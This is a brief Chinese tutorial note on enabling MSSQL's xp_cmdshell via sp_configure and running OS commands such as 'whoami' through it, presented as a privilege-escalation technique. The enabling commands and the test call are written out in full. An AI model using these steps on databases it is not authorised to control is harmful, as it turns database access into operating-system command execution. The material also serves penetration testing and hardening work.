通过xp_cmdshell是mssql提权的方法之一,sql 2005版本以后xp_cmdshell是默认关闭的了的。
这个时候需要手动打开,新建查询之后输入如下命令。
EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
现在已经启动了,用whoami命令测试一下,有正确回显
EXEC master.dbo.xp_cmdshell 'whoami'//该处填写需要测试的命令
上述的操作是建立在xp_cmdshell存在的情况下,可以在左边看到
如果没有这个模块,需要进行其他操作,我没有遇到该模块被删除的问题,但是为了问题的完整性还是要提一下,如果遇到被删除的情况可以看看这个师傅的文章。https://blog.csdn.net/edwang133/article/details/2745642